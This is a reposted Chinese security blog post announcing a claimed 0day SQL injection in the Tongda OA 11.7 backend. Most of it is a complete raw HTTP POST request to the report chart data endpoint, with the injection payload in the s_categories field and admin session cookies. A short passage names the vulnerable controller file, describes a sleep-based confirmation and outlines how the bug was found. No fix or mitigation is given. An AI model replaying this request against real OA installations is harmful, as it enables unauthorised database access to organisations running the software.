0Day | 通达OA 11.7 存在后台SQL注入漏洞

  • A+
所属分类:安全文章

0Day | 通达OA 11.7 存在后台SQL注入漏洞

0Day | 通达OA 11.7 存在后台SQL注入漏洞


POST /general/appbuilder/web/report/repchart/data HTTP/1.1UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/appbuilder/web/report/repchart?reportId=X-ResourceType: xhrCookie: PHPSESSID=1kqh5um8augkhrq8q6n7t23h46; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=cb7abbefConnection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 539x-wvs-id: Acunetix-Deepscan/288Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8
data_path=%5B%5D&s_categories="23fd<>select [email protected]!fdf" #)&i_dataset=10&params%5BsearchParams%5D%5B0%5D%5Bid%5D=&params%5BsearchParams%5D%5B0%5D%5Bkey%5D=1598155037212&params%5BsearchParams%5D%5B0%5D%5Blabel%5D=%E5%85%AC%E5%91%8AID&params%5BsearchParams%5D%5B0%5D%5Btype%5D=text&params%5BsearchParams%5D%5B0%5D%5Bvalue%5D=&params%5BsearchParams%5D%5B0%5D%5Bscope%5D=equal&params%5BsearchParams%5D%5B0%5D%5Bmacro%5D=false&params%5BsearchParams%5D%5B0%5D%5Btype_of_data%5D=rep&params%5BsearchParams%5D%5B0%5D%5Btype_of_reports%5D=select&id=



漏洞证明:

查看Mysql数据库的执行过程,mysql日志文件,可以发现s_categories传入的参数,被mysql数据库完整执行了,没有任何过滤,可以确定存在 mysql注入漏洞

漏洞文件:

webrootgeneralappbuildermodulesreportcontrollersRepChartController.php

0Day | 通达OA 11.7 存在后台SQL注入漏洞

0Day | 通达OA 11.7 存在后台SQL注入漏洞

测试执行sleep函数,注释后面语句来测试,被成功执行。

0Day | 通达OA 11.7 存在后台SQL注入漏洞

挖掘思路:

Fuzz+sql日志关键字匹配+审计

0Day | 通达OA 11.7 存在后台SQL注入漏洞

联系微信

 

END.




欢迎转发~

欢迎关注~

欢迎点赞~


本文始发于微信公众号(黑白天):0Day | 通达OA 11.7 存在后台SQL注入漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: